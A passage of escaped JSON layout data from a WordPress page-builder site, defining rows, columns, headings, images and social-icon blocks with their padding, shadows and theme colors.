"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"185-c2\"]},{\"id\":397,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"185-c3\"]},{\"id\":398,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"%\"},\"right\":{\"value\":\"12\",\"unit\":\"%\"},\"bottom\":{\"value\":\"5\",\"unit\":\"%\"},\"left\":{\"value\":\"17\",\"unit\":\"%\"}},\"media\":{\"tablet\":{\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"%\"},\"right\":{\"value\":\"5\",\"unit\":\"%\"},\"bottom\":{\"value\":\"5\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}}},\"mobile\":{\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}},\"textAlign\":\"center\"}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}}},\"v\":\"1.1\",\"nodes\":[\"185-c4\"]},{\"id\":399,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"style\":{\"typography\":{\"transform\":\"uppercase\"}},\"v\":\"1.1\",\"nodes\":[\"185-c5\"]},{\"id\":400,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"2\"},\"v\":\"1.1\",\"nodes\":[\"185-c5\"]},{\"id\":401,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"185-c6\"]},{\"id\":406,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp\"},\"position\":\"center center\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"y\":\"10\",\"spread\":\"0\",\"blur\":\"20\",\"color\":\"rgba(0, 0, 0, 0.2)\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"400\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"185-c7\"]},{\"id\":407,\"type\":\"hop-content\",\"nodeId\":\"182-c1\",\"nodes\":[\"182-c1\"],\"v\":\"1.1\"},{\"id\":408,\"type\":\"hop-section\",\"nodeId\":\"182-c2\",\"nodes\":[\"182-c2\"],\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\"},{\"id\":409,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c3\",\"nodes\":[\"182-c3\"],\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\"},{\"id\":410,\"type\":\"hop-column\",\"nodeId\":\"182-c4\",\"nodes\":[\"182-c4\"],\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"v\":\"1.1\"},{\"id\":412,\"type\":\"hop-text\",\"nodeId\":\"182-c6\",\"nodes\":[\"182-c6\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[],\"desktop\":[]},\"textAlign\":\"center\"}},{\"id\":413,\"type\":\"hop-content\",\"nodeId\":\"608-c1\",\"nodes\":[\"608-c1\"],\"v\":\"1.1\"},{\"id\":417,\"type\":\"hop-section\",\"nodeId\":\"608-c5\",\"nodes\":[\"608-c2\"],\"v\":\"1.1\",\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":418,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"608-c6\",\"nodes\":[\"608-c3\"],\"v\":\"1.1\"},{\"id\":419,\"type\":\"hop-column\",\"nodeId\":\"608-c7\",\"nodes\":[\"608-c4\"],\"v\":\"1.1\"},{\"id\":420,\"type\":\"hop-text\",\"nodeId\":\"608-c8\",\"nodes\":[\"608-c5\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"typography\":{\"holders\":{\"p\":{\"style\":\"normal\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}}}}},{\"id\":421,\"type\":\"hop-section\",\"nodeId\":\"182-c6\",\"nodes\":[\"182-c6\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]},\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":422,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c7\",\"nodes\":[\"182-c7\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":423,\"type\":\"hop-column\",\"nodeId\":\"182-c8\",\"nodes\":[\"182-c8\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":440,\"type\":\"hop-section\",\"props\":{\"showHeader\":false},\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"}},\"v\":\"1.1\",\"nodes\":[\"182-c2\"]},{\"id\":441,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}},\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c3\"]},{\"id\":442,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.1)\",\"blur\":\"3\",\"y\":\"1\",\"spread\":\"1\"}]},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"background\":{\"color\":\"${theme.colors.4}\"}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c4\",\"182-c11\",\"182-c18\",\"182-c25\"]},{\"id\":443,\"type\":\"hop-image\",\"v\":\"1.1\",\"nodes\":[\"182-c5\",\"182-c12\",\"182-c19\",\"182-c26\"],\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"frameImage\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}}}}}},{\"id\":444,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c6\",\"182-c13\",\"182-c20\",\"182-c27\"]},{\"id\":445,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"15\"}}},\"v\":\"1.1\",\"nodes\":[\"182-c7\",\"182-c14\",\"182-c21\",\"182-c28\"]},{\"id\":446,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c8\",\"182-c15\",\"182-c22\",\"182-c29\"]},{\"id\":447,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c9\",\"182-c16\",\"182-c23\",\"182-c30\"]},{\"id\":448,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"props\":{\"colorType\":\"custom\"},\"nodes\":[\"182-c10\"]},{\"id\":449,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c17\"]},{\"id\":450,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c24\"]},{\"id\":451,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c31\"]},{\"id\":452,\"props\":{\"layout\":{\"equalWidth\":false},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c73\"]},{\"id\":453,\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"182-c74\"]},{\"id\":454,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c75\"]},{\"id\":510,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"style\":{\"background\":{\"color\":\"\"}},\"v\":\"1.1\",\"nodes\":[\"182-c2\"]},{\"id\":511,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}},\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c3\"]},{\"id\":512,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.1)\",\"blur\":\"3\",\"y\":\"1\",\"spread\":\"1\"}]},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"background\":{\"color\":\"${theme.colors.4}\"}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c4\",\"182-c11\",\"182-c18\",\"182-c25\",\"182-c32\",\"182-c39\",\"182-c46\",\"182-c53\",\"182-c60\"]},{\"id\":513,\"type\":\"hop-image\",\"v\":\"1.1\",\"nodes\":[\"182-c5\",\"182-c12\",\"182-c19\",\"182-c26\",\"182-c33\",\"182-c40\",\"182-c47\",\"182-c54\",\"182-c61\"]},{\"id\":514,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c6\",\"182-c13\",\"182-c20\",\"182-c27\",\"182-c34\",\"182-c41\",\"182-c48\",\"182-c55\",\"182-c62\"]},{\"id\":515,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"15\"}}},\"v\":\"1.1\",\"nodes\":[\"182-c7\",\"182-c14\",\"182-c21\",\"182-c28\",\"182-c35\",\"182-c42\",\"182-c49\",\"182-c56\",\"182-c63\"]},{\"id\":516,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c8\",\"182-c15\",\"182-c22\",\"182-c29\",\"182-c36\",\"182-c43\",\"182-c50\",\"182-c57\",\"182-c64\"]},{\"id\":517,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c9\",\"182-c16\",\"182-c23\",\"182-c30\",\"182-c37\",\"182-c44\",\"182-c51\",\"182-c58\",\"182-c65\"]},{\"id\":518,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"props\":{\"colorType\":\"custom\"},\"nodes\":[\"182-c10\",\"182-c24\",\"182-c45\",\"182-c52\",\"182-c59\",\"182-c66\"]},{\"id\":519,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c31\"]},{\"id\":520,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c17\"]},{\"id\":521,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c38\"]},{\"id\":522,\"props\":{\"layout\":{\"equalWidth\":false,\"equalHeight\":true},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c67\"]},{\"id\":523,\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"182-c68\"]},{\"id\":524,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c69\"]},{\"id\":605,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"v\":\"1.1\",\"nodes\":[\"182-c70\"]},{\"id\":606,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}},\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c71\"]},{\"id\":607,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"boxShadow\":{\"enabled\":false,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.1)\",\"blur\":\"3\",\"y\":\"1\",\"spread\":\"1\"}]},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}},\"states\":{\"hover\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"20\",\"spread\":\"2\"}]},\"transition\":{\"duration\":{\"value\":\"0.5\"}},\"transform\":{\"translate\":{\"y\":{\"value\":\"-2\"}}}}},\"background\":{\"color\":\"${theme.colors.4}\"}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c72\",\"182-c79\",\"182-c86\",\"182-c93\",\"182-c100\",\"182-c117\",\"182-c123\"]},{\"id\":608,\"type\":\"hop-image\",\"v\":\"1.1\",\"nodes\":[\"182-c73\",\"182-c80\",\"182-c87\",\"182-c94\",\"182-c101\",\"182-c118\",\"182-c124\"]},{\"id\":609,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c74\",\"182-c81\",\"182-c88\",\"182-c95\",\"182-c102\",\"182-c119\",\"182-c125\"]},{\"id\":610,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"textAlign\":\"center\"},\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"15\"}},\"verticalAlign\":\"center\"},\"v\":\"1.1\",\"nodes\":[\"182-c75\",\"182-c82\",\"182-c89\",\"182-c96\",\"182-c103\",\"182-c120\",\"182-c126\"]},{\"id\":611,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c76\",\"182-c83\",\"182-c90\",\"182-c97\",\"182-c104\",\"182-c121\",\"182-c127\"]},{\"id\":612,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c77\",\"182-c84\",\"182-c91\",\"182-c98\",\"182-c105\",\"182-c122\",\"182-c128\"]},{\"id\":613,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c78\",\"182-c85\",\"182-c92\",\"182-c99\",\"182-c106\",\"182-c129\"]},{\"id\":614,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c85\"]},{\"id\":615,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c92\"]},{\"id\":616,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c99\"]},{\"id\":617,\"props\":{\"layout\":{\"equalWidth\":false},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c135\"]},{\"id\":618,\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"182-c136\"]},{\"id\":619,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c137\"]},{\"id\":620,\"type\":\"hop-section\",\"nodeId\":\"182-c96\",\"nodes\":[\"182-c96\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]},\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":623,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"182-c99\",\"nodes\":[\"182-c99\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":624,\"type\":\"hop-column\",\"nodeId\":\"182-c100\",\"nodes\":[\"182-c100\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":625,\"type\":\"hop-heading\",\"nodeId\":\"182-c101\",\"nodes\":[\"182-c101\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}},\"props\":{\"headerType\":\"2\"}},{\"id\":626,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"style\":{\"background\":{\"color\":\"\"}},\"v\":\"1.1\",\"nodes\":[\"182-c145\"]},{\"id\":627,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}},\"mobile\":{\"layout\":{\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c146\"]},{\"id\":628,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.1)\",\"blur\":\"3\",\"y\":\"1\",\"spread\":\"1\"}]},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c159\",\"182-c166\"]},{\"id\":629,\"type\":\"hop-image\",\"v\":\"1.1\",\"nodes\":[\"182-c148\",\"182-c160\",\"182-c167\"]},{\"id\":630,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c149\",\"182-c161\",\"182-c168\"]},{\"id\":631,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"15\"}}},\"v\":\"1.1\",\"nodes\":[\"182-c150\",\"182-c162\